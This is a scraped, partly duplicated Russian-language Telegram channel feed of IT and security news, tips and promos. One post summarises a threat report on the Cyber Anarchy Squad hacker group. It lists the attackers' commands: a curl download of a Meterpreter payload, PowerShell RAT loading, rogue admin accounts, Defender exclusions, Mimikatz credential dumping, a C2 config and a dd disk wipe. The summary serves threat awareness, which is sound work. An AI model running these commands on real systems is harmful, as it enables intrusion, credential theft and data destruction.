КОСЯК ТЫСЯЧЕЛЕТИЯ!
ДЕСЯТКИ ТЫСЯЧ КОМПОВ ЛЕЖАТ!
АЭРОПОРТЫ НЕ ФУНКЦИОНИРУЮТ!
КО-КО-КО
РЕПУТАЦИЯ КОМПАНИИ НА НУЛЕ
CrowdStrike разорится
Тем временем CrowdStrike:
ДЕСЯТКИ ТЫСЯЧ КОМПОВ ЛЕЖАТ!
АЭРОПОРТЫ НЕ ФУНКЦИОНИРУЮТ!
КО-КО-КО
РЕПУТАЦИЯ КОМПАНИИ НА НУЛЕ
CrowdStrike разорится
Тем временем CrowdStrike:
Forwarded from 42 секунды
WSJ: CrowdStrike сообщает про рост квартальной выручки и повышает прогноз на весь год
– Выручка CrowdStrike выросла на 29%, до $1,01 млрд
– Аналитики ожидали, что выручка будет $982,8 млн
– Квартальный убыток CrowdStrike составил $16,8 млн
– Годом ранее компания показала прибыль $26,7 млн
– Показатель ARR увеличился на 27%, до $4,02 млрд
– Выручка за новый квартал будет $1,03-1,04 млрд
– По итогам всего года она будет $3,92-3,93 млрд
– Прошлый прогноз CrowdStrike был $3,89-3,9 млрд
– CrowdStrike основали бывшие руководители McAfee
– Почти 300 компаний из Fortune 500 стали клиентами
@ftsec
– Выручка CrowdStrike выросла на 29%, до $1,01 млрд
– Аналитики ожидали, что выручка будет $982,8 млн
– Квартальный убыток CrowdStrike составил $16,8 млн
– Годом ранее компания показала прибыль $26,7 млн
– Показатель ARR увеличился на 27%, до $4,02 млрд
– Выручка за новый квартал будет $1,03-1,04 млрд
– По итогам всего года она будет $3,92-3,93 млрд
– Прошлый прогноз CrowdStrike был $3,89-3,9 млрд
– CrowdStrike основали бывшие руководители McAfee
– Почти 300 компаний из Fortune 500 стали клиентами
@ftsec
На TryHackMe стартанул очередной рождественский конкурс Advent of Cyber 2024
В игровой форме нам предлагают спасти Санта Клауса и Рождество от рук злых хакеров. Я каждый год участвую в этом конкурсе и призываю всех присоединиться. Очень интересные задания, знакомство с ИБ с разных сторон, знаний в ИТ и ИБ не требуется - всё объяснят с самого начала. Участие бесплатное
В игровой форме нам предлагают спасти Санта Клауса и Рождество от рук злых хакеров. Я каждый год участвую в этом конкурсе и призываю всех присоединиться. Очень интересные задания, знакомство с ИБ с разных сторон, знаний в ИТ и ИБ не требуется - всё объяснят с самого начала. Участие бесплатное
TryHackMe
TryHackMe | Cyber Security Training
TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
Forwarded from linkmeup
Selectel Network MeetUp#11: о вендоре на букву М
12 декабря Selectel проведет Network MeetUp о том, что мучительно знакомо каждому сетевому инженеру. Обсудят использование оборудования на букву «М», его плюсы и минусы, а также кейсы его применения применения.
В программе мероприятия четыре доклада:
● М***k у небольшого оператора связи
● М***k в проде Selectel
● Умные сетевые карты
● От идеи до макета: продукт по Agile
Офлайн участников также ждет:
— Настройка сетевого оборудования на скорость
— Фото и мем зоны
— Голосование за наиболее популярный способ управления M***k
Приходите офлайн в офис Selectel в Санкт-Петербурге или подключайтесь онлайн.
Мероприятие бесплатное. Посмотреть программу митапа и зарегистрироваться: https://slc.tl/bi81n
Реклама, АО «Селектел», ИНН: 7810962785, ERID: 2VtzqwRvNQG
12 декабря Selectel проведет Network MeetUp о том, что мучительно знакомо каждому сетевому инженеру. Обсудят использование оборудования на букву «М», его плюсы и минусы, а также кейсы его применения применения.
В программе мероприятия четыре доклада:
● М***k у небольшого оператора связи
● М***k в проде Selectel
● Умные сетевые карты
● От идеи до макета: продукт по Agile
Офлайн участников также ждет:
— Настройка сетевого оборудования на скорость
— Фото и мем зоны
— Голосование за наиболее популярный способ управления M***k
Приходите офлайн в офис Selectel в Санкт-Петербурге или подключайтесь онлайн.
Мероприятие бесплатное. Посмотреть программу митапа и зарегистрироваться: https://slc.tl/bi81n
Реклама, АО «Селектел», ИНН: 7810962785, ERID: 2VtzqwRvNQG
Linux Foundation раздает скидки на курсы и сертификаты. Халява закончится 11 декабря. Успевайте
Linux Foundation - Education
Promo Inactive - Linux Foundation - Education
Sign up for our newsletter to get updates on our latest promotions.
Надоело скачивать софт на винду в интернете?
scoop.sh - пакетный менеджер
scoop.sh - пакетный менеджер
> scoop search python
Results from local buckets...
Name Version Source Binaries
---- ------- ------ --------
python 3.10.5 main
winpython 3.10.4.0 main
> scoop install python
...
Creating shim for 'python.exe'.
'python' (3.10.5) was installed successfully!
Forwarded from Кибердом
Как связаны принтеры и стеганография?
Оказывается, напрямую. Принтеры умеют оставлять скрытые метки на каждом распечатанном листе. Такая технология и называется стеганографией, а её идея далеко не нова — вспомните картины Леонардо да Винчи, где до сих пор находят скрытые послания.
В 1992 году компания Xerox придумала, как применить это для безопасности, и запатентовала способ маркировки документов. Его назвали Machine Identification Code (MIC). Если проще — «жёлтые точки». Позже этот подход стали использовать и другие производители принтеров.
🔓 Как это работает?
На листе размещаются едва заметные жёлтые точки, с помощью которых можно определить серийный номер принтера, модель устройства, дату и время печати.
Проверить их наличие просто: энтузиасты из Германии создали сервис Dotspotter, куда можно загрузить скан документа и узнать, есть ли на нём такие метки. Это отличный способ проверить, маркирует ли ваш принтер документы без вашего ведома.
🦖 А студенты из Технического университета Дрездена пошли дальше и разработали фреймворк DEDA для выявления каналов утечки данных и обеспечения безопасности. С его помощью можно:
1. Находить такие точки в документах.
2. «Замусоривать» метки вашего принтера, чтобы никто не смог их использовать.
3. Создавать свои собственные метки, чтобы отследить, куда дальше попадут ваши документы.
Теперь вы знаете, что скрытые механизмы принтеров — это не просто технологии из прошлого, а мощный инструмент для предотвращения утечек и обеспечения конфиденциальности. Расскажите в комментариях, знали о таком способе защиты информации?
#без_бюджетов #Дмитрий_Борощук
🏠 Кибердом & Бизнес
Оказывается, напрямую. Принтеры умеют оставлять скрытые метки на каждом распечатанном листе. Такая технология и называется стеганографией, а её идея далеко не нова — вспомните картины Леонардо да Винчи, где до сих пор находят скрытые послания.
В 1992 году компания Xerox придумала, как применить это для безопасности, и запатентовала способ маркировки документов. Его назвали Machine Identification Code (MIC). Если проще — «жёлтые точки». Позже этот подход стали использовать и другие производители принтеров.
На листе размещаются едва заметные жёлтые точки, с помощью которых можно определить серийный номер принтера, модель устройства, дату и время печати.
Проверить их наличие просто: энтузиасты из Германии создали сервис Dotspotter, куда можно загрузить скан документа и узнать, есть ли на нём такие метки. Это отличный способ проверить, маркирует ли ваш принтер документы без вашего ведома.
1. Находить такие точки в документах.
2. «Замусоривать» метки вашего принтера, чтобы никто не смог их использовать.
3. Создавать свои собственные метки, чтобы отследить, куда дальше попадут ваши документы.
Теперь вы знаете, что скрытые механизмы принтеров — это не просто технологии из прошлого, а мощный инструмент для предотвращения утечек и обеспечения конфиденциальности. Расскажите в комментариях, знали о таком способе защиты информации?
#без_бюджетов #Дмитрий_Борощук
Please open Telegram to view this post
VIEW IN TELEGRAM
Эффект ложного консе́нсуса — это склонность проецировать свой способ мышления на других людей
Так произошло и со мной. Около десяти лет назад я где-то увидел удобный способ вставки текста из буфера в консоли Linux и пользовался этим способом каждый день, наивно полагая, что всем вокруг это известно и никто даже не задумывается о том, чтобы открыть vim или другой редактор перед созданием файла.
Вчера я понял, что эта магия известна не каждому. Поэтому решил поделиться ей с вами. Итак, чтобы вставить в файл из буфера обмена в терминале надо сделать:
UPD: естественно, в буфере должен быть какой-то текст перед нажатием
Так произошло и со мной. Около десяти лет назад я где-то увидел удобный способ вставки текста из буфера в консоли Linux и пользовался этим способом каждый день, наивно полагая, что всем вокруг это известно и никто даже не задумывается о том, чтобы открыть vim или другой редактор перед созданием файла.
Вчера я понял, что эта магия известна не каждому. Поэтому решил поделиться ей с вами. Итак, чтобы вставить в файл из буфера обмена в терминале надо сделать:
cat > filename
Ctrl + V
Enter
Ctrl + C
UPD: естественно, в буфере должен быть какой-то текст перед нажатием
Ctrl + V
Курс Large Language Model Agents
Сам курс уже заканчивается, но лекции и слайды доступны
- Foundation of LLMs
- Reasoning
- Planning, tool use
- LLM agent infrastructure
- Retrieval-augmented generation
- Code generation, data science
- Multimodal agents, robotics
- Evaluation and benchmarking on agent applications
- Privacy, safety and ethics
- Human-agent interaction, personalization, alignment
- Multi-agent collaboration
#LLM #course
Сам курс уже заканчивается, но лекции и слайды доступны
- Foundation of LLMs
- Reasoning
- Planning, tool use
- LLM agent infrastructure
- Retrieval-augmented generation
- Code generation, data science
- Multimodal agents, robotics
- Evaluation and benchmarking on agent applications
- Privacy, safety and ethics
- Human-agent interaction, personalization, alignment
- Multi-agent collaboration
#LLM #course
llmagents-learning.org
Large Language Model Agents MOOC
MOOC, Fall 2024
https://github.com/kuberhealthy/kuberhealthy
A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus!
#slachnews #k8s
A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus!
#slachnews #k8s
GitHub
GitHub - kuberhealthy/kuberhealthy: A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus!
A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus! - kuberhealthy/kuberhealthy
Falcosidekick - коннектор Falco (eBPF аудит сисколов) ко всему на свете - позволит отправлять уведомленния о событиях в мессенджеры, БД, Jira, да куда угодно
И falcosidekick-ui - UI к нему
#falco #security
И falcosidekick-ui - UI к нему
#falco #security
GitHub
GitHub - falcosecurity/falcosidekick: Connect Falco to your ecosystem
Connect Falco to your ecosystem. Contribute to falcosecurity/falcosidekick development by creating an account on GitHub.
Сквозь тени анархии: разбираем атаки Cyber Anarchy Squad
Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.
2. Execution (Выполнение):
- Запуск команд через MS SQL:
-Процесс cmd.exe запускается как дочерний процесс
- Запуск PowerShell-скриптов:
-Загрузка обратной оболочки Meterpreter через c URL:
-Запуск Revenge RAT через PowerShell:
3. Persistence (Закрепление):
-Создание учетных записей:
-Автозапуск через реестр:
-Создание службы для RAT:
4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
-Добавление исключений Windows Defender:
- Имитация системных процессов:
5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей):
6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
WMI-запросы:
7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}
8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
Выжимку по командам стащил из Linkedin
#security #report
Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.
2. Execution (Выполнение):
- Запуск команд через MS SQL:
cmd.exe /c
-Процесс cmd.exe запускается как дочерний процесс
sqlservr.exe
- Запуск PowerShell-скриптов:
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1
-Загрузка обратной оболочки Meterpreter через c URL:
cmd.exe" /c cd %appdata% && dir && curl -O [URL]/sdc.exe
-Запуск Revenge RAT через PowerShell:
powershell.exe -WindowStyle Hidden -NoExit -Command
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\<exe_name>.exe').EntryPoint.Invoke($null, @())
3. Persistence (Закрепление):
-Создание учетных записей:
net user admin cas /add
net user admin admin123123123 /add
-Автозапуск через реестр:
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("rpchost", "\"C:\\Windows\\System32\\rpchost.exe\"");
-Создание службы для RAT:
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null);
4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
$guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value }
msiexec.exe /x $guid /quiet
-Добавление исключений Windows Defender:
powershell Add-MpPreference -ExclusionPath '$windir\$system32'
- Имитация системных процессов:
С:\Windows\System32\svxhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей):
sekurlsa::logonpasswords
6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
net user
systeminfo
net localgroup
cd %appdata% && whoami
WMI-запросы:
SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor
7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}
8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
dd if=/dev/zero of=/dev/[VOLUME] bs=4M
Выжимку по командам стащил из Linkedin
#security #report
securelist.ru
Хактивисты C.A.S атакуют российские организации при помощи редких RAT
Эксперты «Лаборатории Касперского» разбирают атаки группы C.A.S, которая использует редкие троянцы удаленного доступа и публикует данные о жертвах в открытых Telegram-каналах.
Mikrotik Ninja
Давно хотел сделать что-то полезное для сообщества. Идеально было бы для этого совместить свою экспертизу в Mikrotik с навыками DevOps. Идея для проекта пришла из админского опыта. Так вышло, что почти во всех компаниях, где я работал сисадмином или сетевиком…
А на фоне всего этого веселья с Интернетом, хочу напомнить, что у меня для ваших Mikrotik'ов есть мониторинг.
https://t.me/mikrotikninja/1768
Скоро допилю бота для регистрации без участия человека (меня )
https://t.me/mikrotikninja/1768
Скоро допилю бота для регистрации без участия человека (меня )
Telegram
Mikrotik Ninja
Давно хотел сделать что-то полезное для сообщества. Идеально было бы для этого совместить свою экспертизу в Mikrotik с навыками DevOps.
Идея для проекта пришла из админского опыта. Так вышло, что почти во всех компаниях, где я работал сисадмином или сетевиком…
Идея для проекта пришла из админского опыта. Так вышло, что почти во всех компаниях, где я работал сисадмином или сетевиком…
Ходят слухи, что в RouterOS завезут EVPN
https://forum.mikrotik.com/viewtopic.php?t=214071#p1120894
https://forum.mikrotik.com/viewtopic.php?t=214071#p1120894
У avito есть классная репа - справочник по работе в ИТ команде. Среди прочего в ней есть описание грейдов инженеров. Полезно для понимания как и куда расти
GitHub
playbook/developer-profile.md at master · avito-tech/playbook
AvitoTech team playbook. Contribute to avito-tech/playbook development by creating an account on GitHub.